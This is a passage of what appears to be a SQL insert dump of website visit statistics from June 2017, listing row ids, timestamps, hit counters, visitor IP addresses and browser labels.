,'51.255.65.90','other'),(121807,1497526202,1,1,0,0,'217.182.132.78','other'),(121808,1497526212,1,1,0,0,'194.246.121.155','firefox'),(121809,1497526311,1,0,1,0,'66.249.76.108',''),(121810,1497526312,1,1,0,0,'164.132.161.68','other'),(121811,1497526893,1,0,1,0,'66.249.66.201',''),(121812,1497526994,1,1,0,0,'164.132.161.21','other'),(121813,1497527012,1,1,0,0,'77.120.100.245','chrome'),(121814,1497527189,1,0,1,0,'66.249.66.157',''),(121815,1497527200,1,1,0,0,'217.182.132.37','other'),(121816,1497527382,1,1,0,0,'8.29.198.26','other'),(121817,1497527733,1,1,0,0,'91.196.177.129','chrome'),(121818,1497528210,1,1,0,0,'95.132.54.34','chrome'),(121819,1497528838,1,1,0,0,'164.132.161.75','other'),(121820,1497528857,1,0,1,0,'68.180.230.48',''),(121821,1497529044,1,0,1,0,'66.249.76.108',''),(121822,1497529722,1,1,0,0,'51.255.65.89','other'),(121823,1497529771,1,1,0,0,'66.249.76.91','chrome'),(121824,1497529906,1,1,0,0,'164.132.161.4','other'),(121825,1497530201,1,1,0,0,'51.255.65.12','other'),(121826,1497530862,1,1,0,0,'217.182.132.182','other'),(121827,1497531435,1,1,0,0,'157.55.39.178','other'),(121828,1497532114,1,1,0,0,'51.255.71.110','other'),(121829,1497532340,1,1,0,0,'51.255.71.127','other'),(121830,1497532503,1,1,0,0,'178.95.247.243','firefox'),(121831,1497532729,1,1,0,0,'92.112.50.216','firefox'),(121832,1497532733,1,1,0,0,'91.196.178.68','chrome'),(121833,1497532751,1,1,0,0,'5.196.87.173','other'),(121834,1497532810,1,1,0,0,'164.132.162.160','other'),(121835,1497532819,2,2,0,0,'5.255.253.54','other'),(121836,1497532836,3,3,0,0,'178.154.200.42','other'),(121837,1497532845,1,1,0,0,'5.255.253.23','other'),(121838,1497532849,2,2,0,0,'141.8.142.134','other'),(121839,1497532857,1,1,0,0,'141.8.132.47','other'),(121840,1497533428,1,1,0,0,'95.132.33.198','firefox'),(121841,1497533482,1,1,0,0,'178.95.247.243','firefox'),(121842,1497533706,1,1,0,0,'91.196.178.68','chrome'),(121843,1497533745,1,1,0,0,'37.9.113.16','other'),(121844,1497533806,1,1,0,0,'51.255.65.10','other'),(121845,1497533945,1,1,0,0,'217.182.132.146','other'),(121846,1497533966,1,0,1,0,'68.180.230.48',''),(121847,1497534726,1,1,0,0,'91.196.178.68','chrome'),(121848,1497534842,1,1,0,0,'178.95.247.243','firefox'),(121849,1497534874,1,1,0,0,'31.13.114.78','other'),(121850,1497534880,1,1,0,0,'66.220.145.244','other'),(121851,1497535113,1,1,0,0,'91.196.178.40','chrome'),(121852,1497535258,1,1,0,0,'91.196.178.134','chrome'),(121853,1497535654,1,1,0,0,'217.182.132.151','other'),(121854,1497535675,1,1,0,0,'91.196.178.71','chrome'),(121855,1497535765,2,2,0,0,'91.196.178.132','chrome'),(121856,1497535817,1,1,0,0,'91.196.178.40','firefox'),(121857,1497535881,1,1,0,0,'51.255.71.127','other'),(121858,1497536061,1,1,0,0,'164.132.161.48','other'),(121859,1497536274,1,1,0,0,'212.90.63.4','chrome'),(121860,1497536431,1,1,0,0,'51.255.65.45','other'),(121861,1497536451,1,1,0,0,'91.196.178.161','chrome'),(121862,1497536470,1,1,0,0,'51.255.65.75','other'),(121863,1497536514,1,1,0,0,'217.182.132.50','other'),(121864,1497536807,1,1,0,0,'40.77.167.45','other'),(121865,1497536902,2,2,0,0,'91.196.178.164','chrome'),(121866,1497537199,1,1,0,0,'193.34.92.39','chrome'),(121867,1497537286,1,1,0,0,'193.19.152.14','other'),(121868,1497537312,1,1,0,0,'217.182.132.190','other'),(121869,1497537598,1,1,0,0,'51.255.65.33','other'),(121870,1497537678,1,1,0,0,'77.121.161.124','other'),(121871,1497538052,1,0,1,0,'66.249.76.89',''),(121872,1497538123,1,1,0,0,'95.133.152.255','chrome'),(121873,1497538217,1,1,0,0,'217.182.132.149','other'),(121874,1497538270,1,1,0,0,'8.29.198.27','other'),(121875,1497538474,1,1,0,0,'95.132.0.47','chrome'),(121876,1497538492,1,1,0,0,'93.77.10.157','chrome'),(121877,1497538714,1,1,0,0,'164.132.161.7','other'),(121878,1497538718,1,1,0,0,'51.255.71.117','other'),(121879,1497539073,1,1,0,0,'217.182.132.32','other'),(121880,1497539110,1,1,0,0,'51.255.65.85','other'),(121881,1497539414,1,1,0,0,'164.132.162.159','other'),(121882,1497539502,1,1,0,0,'216.244.66.237','other'),(121883,1497539625,1,1,0,0,'217.182.132.55','other'),(121884,1497539928,1,1,0,0,'217.69.133.3','other'),(121885,1497539964,1,1,0,0,'164.132.161.94','other'),(121886,1497540115,1,1,0,0,'37.54.16.199','chrome'),(121887,1497540332,1,0,1,0,'66.249.76.91',''),(121888,1497540597,1,0,1,0,'66.249.76.108',''),(121889,1497540827,1,1,0,0,'164.132.162.157','other'),(121890,1497541196,1,1,0,0,'217.69.133.4','other'),(121891,1497541619,1,1,0,0,'164.132.161.31','other'),(121892,1497541671,1,1,0,0,'164.132.162.156','other'),(121893,1497541864,1,1,0,0,'91.196.178.99','chrome'),(121894,1497541912,1,1,0,0,'51.255.65.39','other'),(121895,1497542020,1,1,0,0,'95.132.133.5','chrome'),(121896,1497542402,1,1,0,0,'91.196.178.38','chrome'),(121897,1497542444,1,1,0,0,'164.132.161.92','other'),(121898,1497542612,1,1,0,0,'51.255.65.53','other'),(121899,1497543685,1,1,0,0,'66.249.76.93','chrome'),(121900,1497543780,1,1,0,0,'69.30.198.202','other'),(121901,1497543806,1,1,0,0,'51.255.65.7','other'),(121902,1497543954,1,1,0,0,'46.229.173.193','chrome'),(121903,1497544351,2,2,0,0,'46.250.125.250','chrome'),(121904,1497544436,1,1,0,0,'164.132.161.49','other'),(121905,1497544552,1,0,1,0,'66.249.76.107',''),(121906,1497544740,1,0,1,0,'66.249.66.157',''),(121907,1497544883,1,1,0,0,'66.249.76.108','chrome'),(121908,1497544955,1,1,0,0,'80.241.218.167','other'),(121909,1497545156,1,1,0,0,'46.211.105.60','chrome'),(121910,1497545438,1,1,0,0,'5.58.62.42','other'),(121911,1497545775,1,0,1,0,'66.249.66.199',''),(121912,1497545856,1,1,0,0,'66.249.66.201','chrome'),(121913,1497545956,1,1,0,0,'5.196.87.171','other'),(121914,1497546064,1,1,0,0,'51.255.65.8','other'),(121915,1497546187,1,1,0,0,'217.182.132.97','other'),(121916,1497546218,1,1,0,0,'193.201.224.32','firefox'),(121917,1497546249,1,1,0,0,'5.9.98.178','other'),(121918,1497546335,1,1,0,0,'217.182.132.184','other'),(121919,1497546858,1,0,1,0,'68.180.230.48',''),(121920,1497546935,1,1,0,0,'164.132.161.44','other'),(121921,1497547152,1,1,0,0,'5.9.98.178','other'),(121922,1497547199,1,1,0,0,'51.255.71.119','other'),(121923,1497547204,1,1,0,0,'51.255.65.59','other'),(121924,1497547217,1,1,0,0,'217.182.132.58','other'),(121925,1497547474,1,0,1,0,'66.249.76.89',''),(121926,1497547547,1,1,0,0,'217.182.132.65','other'),(121927,1497547592,1,1,0,0,'95.132.36.232','chrome'),(121928,1497547600,1,1,0,0,'185.26.180.178','other'),(121929,1497547731,1,1,0,0,'137.74.207.110','other'),(121930,1497547849,1,1,0,0,'164.132.161.86','other'),(121931,1497547985,1,1,0,0,'95.132.114.188','chrome'),(121932,1497548055,1,1,0,0,'5.9.98.178','other'),(121933,1497548243,1,1,0,0,'173.252.91.103','other'),(121934,1497548261,1,1,0,0,'46.201.112.200','chrome'),(121935,1497548316,1,0,1,0,'66.249.66.201',''),(121936,1497548395,1,1,0,0,'164.132.161.36','other'),(121937,1497548489,1,1,0,0,'51.255.65.94','other'),(121938,1497548643,1,1,0,0,'164.132.161.35','other'),(121939,1497548709,1,1,0,0,'79.110.131.188','chrome'),(121940,1497548748,1,1,0,0,'164.132.161.11','other'),(121941,1497548951,1,1,0,0,'164.132.161.25','other'),(121942,1497548958,1,1,0,0,'5.9.98.178','other'),(121943,1497549121,1,1,0,0,'8.29.198.26','other'),(121944,1497549162,1,1,0,0,'141.8.142.134','other'),(121945,1497549337,1,1,0,0,'91.196.178.100','chrome'),(121946,1497549353,1,1,0,0,'37.55.12.64','chrome'),(121947,1497549463,1,1,0,0,'217.182.132.84','other'),(121948,1497549473,1,1,0,0,'82.193.118.18','chrome'),(121949,1497549587,1,0,1,0,'66.249.76.107',''),(121950,1497549861,1,1,0,0,'5.9.98.178','other'),(121951,1497550409,1,1,0,0,'164.132.161.10','other'),(121952,1497550642,1,0,1,0,'66.249.76.108',''),(121953,1497550800,1,1,0,0,'217.182.132.37','other'),(121954,1497551460,1,1,0,0,'37.53.89.22','chrome'),(121955,1497551494,1,0,1,0,'66.249.66.157',''),(121956,1497551608,1,1,0,0,'164.132.161.76','other'),(121957,1497551717,1,1,0,0,'46.219.242.147','chrome'),(121958,1497552229,2,0,2,0,'66.249.76.91',''),(121959,1497552249,1,1,0,0,'63.243.252.178','other'),(121960,1497552314,1,1,0,0,'51.255.65.21','other'),(121961,1497552585,1,1,0,0,'51.255.65.93','other'),(121962,1497552731,1,0,1,0,'66.249.66.201',''),(121963,1497552794,1,1,0,0,'51.255.65.78','other'),(121964,1497552803,1,1,0,0,'91.196.178.69','chrome'),(121965,1497552830,1,1,0,0,'217.182.132.72','other'),(121966,1497553134,1,1,0,0,'217.182.132.87','other'),(121967,1497553148,1,1,0,0,'217.182.132.63','other'),(121968,1497553307,1,1,0,0,'93.72.227.135','chrome'),(121969,1497553532,1,1,0,0,'217.182.132.188','other'),(121970,1497553598,1,1,0,0,'95.132.49.191','chrome'),(121971,1497553608,1,1,0,0,'80.93.123.49','chrome'),(121972,1497553754,2,2,0,0,'157.55.39.178','other'),(121973,1497553894,1,1,0,0,'164.132.161.54','other'),(121974,1497554209,1,1,0,0,'51.255.71.120','other'),(121975,1497554249,1,1,0,0,'180.76.15.26','other'),(121976,1497554376,1,1,0,0,'137.74.203.194','other'),(121977,1497554538,1,1,0,0,'51.255.65.31','other'),(121978,1497554976,1,1,0,0,'176.124.233.173','chrome'),(121979,1497555004,1,1,0,0,'109.197.222.231','chrome'),(121980,1497555018,1,1,0,0,'91.196.177.78','chrome'),(121981,1497555442,1,1,0,0,'51.255.71.130','other'),(121982,1497555474,1,1,0,0,'94.112.88.148','chrome'),(121983,1497556111,1,1,0,0,'51.255.71.114','other'),(121984,1497556222,1,1,0,0,'37.52.142.60','chrome'),(121985,1497556349,1,1,0,0,'217.182.132.174','other'),(121986,1497556619,1,1,0,0,'164.132.161.82','other'),(121987,1497556865,1,1,0,0,'51.255.65.51','other'),(121988,1497556912,1,1,0,0,'217.182.132.59','other'),(121989,1497556919,1,1,0,0,'40.77.167.101','other'),(121990,1497556963,1,1,0,0,'217.182.132.182','other'),(121991,1497556977,1,1,0,0,'217.182.132.148','other'),(121992,1497557251,1,0,1,0,'68.180.230.48',''),(121993,1497557373,1,1,0,0,'178.137.0.247','chrome'),(121994,1497557561,1,1,0,0,'82.145.220.172','other'),(121995,1497557666,1,1,0,0,'193.194.127.222','chrome'),(121996,1497557943,1,1,0,0,'37.73.220.254','chrome'),(121997,1497558079,1,1,0,0,'193.160.224.188','chrome'),(121998,1497558505,1,1,0,0,'91.196.178.168','chrome'),(121999,1497558592,1,1,0,0,'164.132.161.29','other'),(122000,1497558593,1,1,0,0,'217.182.132.53','other'),(122001,1497558693,1,1,0,0,'51.255.71.112','other'),(122002,1497558901,1,1,0,0,'37.54.19.36','chrome'),(122003,1497558963,1,1,0,0,'91.196.178.68','chrome'),(122004,1497558967,1,1,0,0,'213.108.47.44','other'),(122005,1497559296,1,1,0,0,'46.219.251.54','chrome'),(122006,1497559415,1,1,0,0,'91.196.178.132','chrome'),(122007,1497559604,1,1,0,0,'5.196.87.175','other'),(122008,1497559954,1,1,0,0,'164.132.161.86','other'),(122009,1497559960,1,1,0,0,'8.29.198.26','other'),(122010,1497559990,1,1,0,0,'109.81.209.66','chrome'),(122011,1497560166,1,1,0,0,'217.182.132.74','other'),(122012,1497560184,1,1,0,0,'164.132.161.11','other'),(122013,1497560815,1,1,0,0,'51.255.65.224','other'),(122014,1497560984,1,1,0,0,'217.182.132.27','other'),(122015,1497561719,1,1,0,0,'51.255.71.132','other'),(122016,1497561984,1,1,0,0,'51.255.65.28','other'),(122017,1497562661,1,1,0,0,'107.170.68.59','chrome'),(122018,1497562807,1,1,0,0,'217.182.132.25','other'),(122019,1497563027,1,1,0,0,'164.132.161.48','other'),(122020,1497563666,1,1,0,0,'51.255.65.22','other'),(122021,1497564061,1,1,0,0,'51.255.65.96','other'),(122022,1497564581,1,1,0,0,'164.132.161.92','other'),(122023,1497565470,1,1,0,0,'164.132.161.85','other'),(122024,1497565734,1,1,0,0,'51.255.65.54','other'),(122025,1497566121,1,1,0,0,'66.249.76.108','chrome'),(122026,1497566312,1,1,0,0,'157.55.39.178','other'),(122027,1497566943,1,0,1,0,'66.249.66.195',''),(122028,1497566978,1,1,0,0,'217.182.132.69','other'),(122029,1497567419,1,1,0,0,'217.182.132.178','other'),(122030,1497567871,2,0,2,0,'66.249.76.89',''),(122031,1497568063,1,1,0,0,'141.8.132.1','other'),(122032,1497568071,1,1,0,0,'93.158.152.14','other'),(122033,1497568352,1,1,0,0,'217.182.132.67','other'),(122034,1497568374,1,1,0,0,'217.182.132.59','other'),(122035,1497568880,1,0,1,0,'66.249.66.195',''),(122036,1497569889,1,1,0,0,'216.244.66.237','other'),(122037,1497570128,1,1,0,0,'217.182.132.27','other'),(122038,1497570319,1,1,0,0,'217.182.132.51','other'),(122039,1497570571,1,1,0,0,'46.211.126.234','chrome'),(122040,1497570600,1,1,0,0,'5.255.253.16','other'),(122041,1497570671,1,1,0,0,'217.182.132.7','other'),(122042,1497570797,1,1,0,0,'8.29.198.25','other'),(122043,1497570859,1,1,0,0,'51.255.65.68','other'),(122044,1497571405,1,1,0,0,'164.132.161.5','other'),(122045,1497571633,1,1,0,0,'164.132.161.75','other'),(122046,1497571760,1,1,0,0,'51.255.65.26','other'),(122047,1497571895,1,1,0,0,'164.132.161.91','other'),(122048,1497572781,1,1,0,0,'51.255.65.93','other'),(122049,1497573117,1,1,0,0,'51.255.65.54','other'),(122050,1497573321,1,1,0,0,'157.55.39.178','other'),(122051,1497573356,1,1,0,0,'51.255.71.114','other'),(122052,1497573430,1,1,0,0,'5.196.87.175','other'),(122053,1497573598,1,1,0,0,'37.9.113.8','other'),(122054,1497573608,2,0,2,0,'66.249.76.89',''),(122055,1497573700,1,1,0,0,'51.255.71.121','other'),(122056,1497573718,1,1,0,0,'51.255.65.85','other'),(122057,1497573815,1,1,0,0,'217.182.132.83','other'),(122058,1497573848,1,1,0,0,'66.249.66.199','chrome'),(122059,1497573875,1,0,1,0,'66.249.76.107',''),(122060,1497573901,1,1,0,0,'66.249.76.91','chrome'),(122061,1497574394,1,1,0,0,'217.182.132.175','other'),(122062,1497574436,1,1,0,0,'51.255.65.19','other'),(122063,1497574586,1,1,0,0,'180.76.15.12','other'),(122064,1497574912,1,1,0,0,'217.182.132.180','other'),(122065,1497575140,1,1,0,0,'217.182.132.187','other'),(122066,1497575636,1,1,0,0,'141.8.142.134','other'),(122067,1497575681,1,1,0,0,'141.8.142.152','other'),(122068,1497576094,1,1,0,0,'164.132.161.69','other'),(122069,1497576185,1,0,1,0,'66.249.66.199',''),(122070,1497576384,1,1,0,0,'164.132.161.65','other'),(122071,1497576939,1,1,0,0,'51.255.65.9','other'),(122072,1497577215,1,1,0,0,'164.132.161.66','other'),(122073,1497577315,1,1,0,0,'37.73.252.147','chrome'),(122074,1497577497,1,0,1,0,'66.249.76.89',''),(122075,1497577894,1,1,0,0,'164.132.161.25','other'),(122076,1497578635,1,1,0,0,'164.132.162.154','other'),(122077,1497579387,1,1,0,0,'51.255.65.10','other'),(122078,1497579401,1,1,0,0,'51.255.65.32','other'),(122079,1497579851,1,1,0,0,'51.255.71.133','other'),(122080,1497580009,1,1,0,0,'141.8.142.39','other'),(122081,1497580065,1,1,0,0,'157.55.39.54','other'),(122082,1497580170,1,0,1,0,'66.249.76.109',''),(122083,1497580647,1,1,0,0,'51.255.65.28','other'),(122084,1497581050,1,1,0,0,'217.182.132.59','other'),(122085,1497581637,1,1,0,0,'8.29.198.27','other'),(122086,1497581780,1,1,0,0,'217.182.132.172','other'),(122087,1497581903,1,1,0,0,'51.255.65.42','other'),(122088,1497582275,1,1,0,0,'141.8.142.129','other'),(122089,1497582301,2,2,0,0,'141.8.142.151','other'),(122090,1497582305,1,1,0,0,'5.255.253.33','other'),(122091,1497582311,1,1,0,0,'37.9.113.11','other'),(122092,1497582317,4,4,0,0,'141.8.132.49','other'),(122093,1497582320,1,1,0,0,'37.9.113.16','other'),(122094,1497582322,1,0,1,0,'66.249.76.91',''),(122095,1497582323,2,2,0,0,'5.255.253.73','other'),(122096,1497582326,1,1,0,0,'87.250.224.21','other'),(122097,1497582329,1,1,0,0,'87.250.224.31','other'),(122098,1497582336,1,1,0,0,'141.8.132.4','other'),(122099,1497582342,2,2,0,0,'141.8.183.15','other'),(122100,1497582345,1,1,0,0,'5.255.253.16','other'),(122101,1497582348,1,1,0,0,'95.108.179.12','other'),(122102,1497582354,1,1,0,0,'141.8.142.50','other'),(122103,1497582355,1,0,1,0,'66.249.66.157',''),(122104,1497582359,1,1,0,0,'178.154.149.7','other'),(122105,1497582361,1,1,0,0,'5.255.253.23','other'),(122106,1497582370,1,1,0,0,'95.108.213.3','other'),(122107,1497582372,2,2,0,0,'93.158.152.43','other'),(122108,1497582375,1,1,0,0,'141.8.142.74','other'),(122109,1497582378,1,1,0,0,'141.8.142.51','other'),(122110,1497582387,1,1,0,0,'37.9.113.15','other'),(122111,1497582486,1,1,0,0,'217.182.132.64','other'),(122112,1497582489,1,1,0,0,'164.132.161.16','other'),(122113,1497583058,1,1,0,0,'164.132.162.156','other'),(122114,1497583357,1,1,0,0,'141.0.12.86','other'),(122115,1497583486,2,0,2,0,'66.249.76.89',''),(122116,1497583755,1,1,0,0,'91.196.178.99','chrome'),(122117,1497584135,1,1,0,0,'51.255.71.123','other'),(122118,1497584588,1,1,0,0,'78.154.160.102','chrome'),(122119,1497584749,1,0,1,0,'66.249.76.109',''),(122120,1497584863,1,1,0,0,'164.132.162.188','other'),(122121,1497585080,1,1,0,0,'82.145.222.142','other'),(122122,1497585348,1,0,1,0,'66.249.76.91',''),(122123,1497585357,1,1,0,0,'66.249.76.91','chrome'),(122124,1497585379,1,1,0,0,'157.55.39.178','other'),(122125,1497585571,1,1,0,0,'164.132.161.84','other'),(122126,1497585845,1,1,0,0,'217.182.132.32','other'),(122127,1497586305,1,1,0,0,'157.55.39.54','other'),(122128,1497586688,1,1,0,0,'164.132.161.75','other'),(122129,1497586807,1,1,0,0,'5.196.87.174','other'),(122130,1497586953,1,1,0,0,'46.211.155.15','chrome'),(122131,1497587088,1,1,0,0,'164.132.161.40','other'),(122132,1497587247,1,1,0,0,'164.132.161.64','other'),(122133,1497587474,1,1,0,0,'91.196.178.65','firefox'),(122134,1497587499,1,0,1,0,'66.249.76.93',''),(122135,1497588028,1,1,0,0,'164.132.161.47','other'),(122136,1497588511,1,0,1,0,'66.249.76.71',''),(122137,1497588789,1,1,0,0,'137.74.207.114','other'),(122138,1497588809,1,1,0,0,'66.249.76.89','chrome'),(122139,1497588916,1,1,0,0,'164.132.161.96','other'),(122140,1497589535,1,1,0,0,'164.132.161.70','other'),(122141,1497589739,1,0,1,0,'66.249.76.109',''),(122142,1497589855,1,1,0,0,'91.196.178.68','chrome'),(122143,1497589960,1,1,0,0,'137.74.207.161','other'),(122144,1497590009,1,1,0,0,'216.244.66.237','other'),(122145,1497590440,1,1,0,0,'217.182.132.147','other'),(122146,1497590905,1,1,0,0,'40.77.167.101','other'),(122147,1497590907,1,1,0,0,'91.196.178.71','chrome'),(122148,1497591317,1,1,0,0,'157.55.39.178','other'),(122149,1497591360,1,1,0,0,'128.69.225.24','msie'),(122150,1497591682,1,0,1,0,'66.249.66.199',''),(122151,1497591770,1,1,0,0,'51.255.71.115','other'),(122152,1497592154,1,1,0,0,'207.46.13.173','other'),(122153,1497592228,1,1,0,0,'217.182.132.190','other'),(122154,1497592472,1,1,0,0,'8.29.198.25','other'),(122155,1497592699,1,1,0,0,'51.255.65.40','other'),(122156,1497592985,1,1,0,0,'91.196.178.68','chrome'),(122157,1497593062,2,2,0,0,'91.196.177.46','chrome'),(122158,1497593123,1,1,0,0,'217.182.132.192','other'),(122159,1497593316,1,1,0,0,'178.95.247.243','firefox'),(122160,1497594319,1,0,1,0,'66.249.66.156',''),(122161,1497594680,1,1,0,0,'5.39.49.212','firefox'),(122162,1497594772,1,1,0,0,'51.255.65.9','other'),(122163,1497595371,1,1,0,0,'5.83.17.130','chrome'),(122164,1497595571,1,1,0,0,'91.196.177.46','chrome'),(122165,1497595638,1,0,1,0,'66.249.76.107',''),(122166,1497595703,1,0,1,0,'66.249.66.199',''),(122167,1497595888,1,1,0,0,'91.229.123.10','chrome'),(122168,1497596318,2,2,0,0,'46.219.61.42','chrome'),(122169,1497596514,1,1,0,0,'217.182.132.57','other'),(122170,1497596602,2,2,0,0,'216.244.66.237','other'),(122171,1497596813,1,1,0,0,'207.46.13.173','other'),(122172,1497597151,1,1,0,0,'193.105.124.46','firefox'),(122173,1497598394,1,1,0,0,'217.182.132.191','other'),(122174,1497599132,1,1,0,0,'51.255.65.20','other'),(122175,1497599174,1,1,0,0,'164.132.164.180','other'),(122176,1497599672,1,1,0,0,'51.255.65.89','other'),(122177,1497599740,1,1,0,0,'193.165.236.6','chrome'),(122178,1497599753,1,1,0,0,'151.80.27.116','other'),(122179,1497599802,1,1,0,0,'5.196.87.172','other'),(122180,1497600315,1,0,1,0,'66.249.76.107',''),(122181,1497600316,1,1,0,0,'217.182.132.94','other'),(122182,1497600411,1,1,0,0,'51.255.65.23','other'),(122183,1497601238,1,1,0,0,'51.255.71.131','other'),(122184,1497601427,1,1,0,0,'217.182.132.190','other'),(122185,1497601430,1,0,1,0,'66.249.76.89',''),(122186,1497601773,1,1,0,0,'51.255.65.62','other'),(122187,1497602042,1,1,0,0,'40.77.167.101','other'),(122188,1497602202,1,0,1,0,'66.249.76.109',''),(122189,1497602305,1,1,0,0,'164.132.161.61','other'),(122190,1497602451,1,1,0,0,'95.135.201.103','chrome'),(122191,1497602772,1,1,0,0,'164.132.162.154','other'),(122192,1497603305,1,1,0,0,'8.29.198.26','other'),(122193,1497603312,1,1,0,0,'164.132.161.14','other'),(122194,1497603571,1,1,0,0,'78.111.188.243','chrome'),(122195,1497603789,1,1,0,0,'178.95.247.243','firefox'),(122196,1497603880,8,8,0,0,'173.212.230.166','other'),(122197,1497603887,1,1,0,0,'66.249.66.156','chrome'),(122198,1497603931,1,1,0,0,'217.182.132.34','other'),(122199,1497603974,1,1,0,0,'164.132.162.154','other'),(122200,1497604115,1,1,0,0,'164.132.161.20','other'),(122201,1497604371,1,1,0,0,'137.74.207.161','other'),(122202,1497604465,1,1,0,0,'91.196.178.133','chrome'),(122203,1497604528,1,1,0,0,'91.196.178.68','chrome'),(122204,1497604770,1,1,0,0,'178.95.247.243','firefox'),(122205,1497605214,1,1,0,0,'91.196.177.46','chrome'),(122206,1497605483,1,1,0,0,'91.196.178.68','firefox'),(122207,1497605635,1,1,0,0,'164.132.161.73','other'),(122208,1497605683,1,1,0,0,'91.196.178.72','firefox'),(122209,1497605926,1,1,0,0,'217.182.132.148','other'),(122210,1497606400,1,1,0,0,'91.196.178.68','firefox'),(122211,1497606463,1,1,0,0,'91.196.178.72','chrome'),(122212,1497606531,1,1,0,0,'164.132.161.21','other'),(122213,1497606635,1,0,1,0,'66.249.76.107',''),(122214,1497606798,1,1,0,0,'51.255.65.84','other'),(122215,1497606895,1,1,0,0,'130.180.219.143','firefox'),(122216,1497606979,1,1,0,0,'51.255.65.81','other'),(122217,1497607098,1,1,0,0,'91.124.119.224','chrome'),(122218,1497607100,1,1,0,0,'51.255.65.53','other'),(122219,1497607139,1,1,0,0,'91.196.177.46','chrome'),(122220,1497607209,1,1,0,0,'178.95.247.243','firefox'),(122221,1497607321,1,1,0,0,'157.55.39.54','other'),(122222,1497607444,1,1,0,0,'91.196.178.68','firefox'),(122223,1497607636,1,0,1,0,'66.249.66.156',''),(122224,1497608075,1,0,1,0,'66.249.66.157',''),(122225,1497608098,1,1,0,0,'66.102.9.29','chrome'),(122226,1497608202,1,0,1,0,'66.249.76.109',''),(122227,1497608326,1,1,0,0,'66.249.76.109','chrome'),(122228,1497608412,1,1,0,0,'51.255.64.106','other'),(122229,1497608444,1,0,1,0,'66.249.76.89',''),(122230,1497608961,1,1,0,0,'51.255.65.91','other'),(122231,1497609065,1,0,1,0,'66.249.66.195',''),(122232,1497609186,1,0,1,0,'66.249.66.157',''),(122233,1497609291,1,0,1,0,'66.249.66.156',''),(122234,1497609815,1,1,0,0,'66.249.76.107','chrome'),(122235,1497610262,1,0,1,0,'66.249.76.109',''),(122236,1497610451,1,1,0,0,'66.249.76.89','chrome'),(122237,1497610513,1,1,0,0,'51.255.65.94','other'),(122238,1497610610,1,1,0,0,'217.182.132.176','other'),(122239,1497610843,1,1,0,0,'82.207.96.172','chrome'),(122240,1497611096,1,1,0,0,'217.182.132.6','other'),(122241,1497611249,1,0,1,0,'66.249.66.201',''),(122242,1497611333,1,1,0,0,'217.182.132.147','other'),(122243,1497611480,1,1,0,0,'217.69.133.6','other'),(122244,1497611744,1,1,0,0,'141.8.142.152','other'),(122245,1497611745,1,1,0,0,'141.8.132.47','other'),(122246,1497611926,1,0,1,0,'66.249.76.89',''),(122247,1497612124,1,1,0,0,'217.182.132.85','other'),(122248,1497612425,1,1,0,0,'91.196.178.68','firefox'),(122249,1497612568,1,1,0,0,'51.255.65.224','other'),(122250,1497613060,1,1,0,0,'137.74.207.161','other'),(122251,1497613133,1,1,0,0,'91.196.178.67','chrome'),(122252,1497613754,1,1,0,0,'46.185.115.177','chrome'),(122253,1497613773,1,1,0,0,'91.196.178.71','chrome'),(122254,1497613848,1,1,0,0,'217.182.132.20','other'),(122255,1497614086,1,1,0,0,'51.255.65.54','other'),(122256,1497614110,1,1,0,0,'91.196.178.68','chrome'),(122257,1497614139,1,1,0,0,'8.29.198.25','other'),(122258,1497614705,1,1,0,0,'31.43.50.13','chrome'),(122259,1497614715,1,1,0,0,'164.132.161.19','other'),(122260,1497615249,1,1,0,0,'51.255.65.73','other'),(122261,1497615451,1,1,0,0,'207.46.13.176','other'),(122262,1497615620,1,1,0,0,'178.95.247.243','firefox'),(122263,1497615636,1,0,1,0,'66.249.66.158',''),(122264,1497616090,1,1,0,0,'217.182.132.6','other'),(122265,1497616484,1,1,0,0,'137.74.207.102','other'),(122266,1497616512,1,1,0,0,'91.196.178.71','chrome'),(122267,1497617011,1,1,0,0,'5.255.253.46','other'),(122268,1497617137,1,1,0,0,'51.255.65.2','other'),(122269,1497617147,1,1,0,0,'91.196.178.72','chrome'),(122270,1497617334,1,1,0,0,'91.196.178.39','chrome'),(122271,1497617512,1,1,0,0,'164.132.161.91','other'),(122272,1497617558,1,1,0,0,'51.255.65.80','other'),(122273,1497618090,1,1,0,0,'82.207.121.233','chrome'),(122274,1497618325,1,1,0,0,'51.255.71.118','other'),(122275,1497618737,1,1,0,0,'51.255.65.50','other'),(122276,1497618934,1,1,0,0,'178.95.247.243','firefox'),(122277,1497619288,1,1,0,0,'164.132.161.67','other'),(122278,1497619399,1,1,0,0,'164.132.161.34','other'),(122279,1497619456,2,2,0,0,'195.43.70.81','chrome'),(122280,1497619541,1,1,0,0,'137.74.207.170','other'),(122281,1497619909,1,1,0,0,'85.114.208.135','chrome'),(122282,1497620004,1,1,0,0,'164.132.161.50','other'),(122283,1497620056,1,1,0,0,'217.182.132.171','other'),(122284,1497620058,1,1,0,0,'207.46.13.173','other'),(122285,1497620137,1,1,0,0,'216.244.66.237','other'),(122286,1497620586,1,1,0,0,'93.74.137.219','chrome'),(122287,1497620634,1,1,0,0,'151.80.27.116','other'),(122288,1497620688,1,1,0,0,'217.182.132.172','other'),(122289,1497620692,1,1,0,0,'46.165.197.142','other'),(122290,1497620868,1,1,0,0,'94.179.11.163','chrome'),(122291,1497621075,1,1,0,0,'164.132.161.24','other'),(122292,1497621310,1,1,0,0,'164.132.161.85','other'),(122293,1497621653,1,0,1,0,'66.249.76.93',''),(122294,1497621765,1,1,0,0,'51.255.65.62','other'),(122295,1497621771,1,1,0,0,'51.255.65.70','other'),(122296,1497622083,1,1,0,0,'217.182.132.188','other'),(122297,1497622141,1,1,0,0,'51.255.65.18','other'),(122298,1497622161,1,1,0,0,'164.132.161.16','other'),(122299,1497622296,1,1,0,0,'91.196.178.70','chrome'),(122300,1497622552,1,1,0,0,'217.182.132.84','other'),(122301,1497623028,1,1,0,0,'164.132.161.12','other'),(122302,1497623150,1,0,1,0,'66.249.76.93',''),(122303,1497623271,1,1,0,0,'217.182.132.52','other'),(122304,1497623491,1,1,0,0,'51.255.65.82','other'),(122305,1497623784,1,1,0,0,'217.182.132.240','other'),(122306,1497624132,1,0,1,0,'66.249.66.199',''),(122307,1497624244,2,0,2,0,'66.249.76.93',''),(122308,1497624350,1,1,0,0,'164.132.161.49','other'),(122309,1497624966,1,1,0,0,'8.29.198.27','other'),(122310,1497625481,1,0,1,0,'66.249.76.91',''),(122311,1497625587,1,1,0,0,'217.182.132.68','other'),(122312,1497626322,1,1,0,0,'217.182.132.24','other'),(122313,1497626443,1,0,1,0,'66.249.76.108',''),(122314,1497626962,1,1,0,0,'51.255.65.9','other'),(122315,1497626982,1,1,0,0,'51.255.65.79','other'),(122316,1497627020,1,1,0,0,'95.133.150.31','other'),(122317,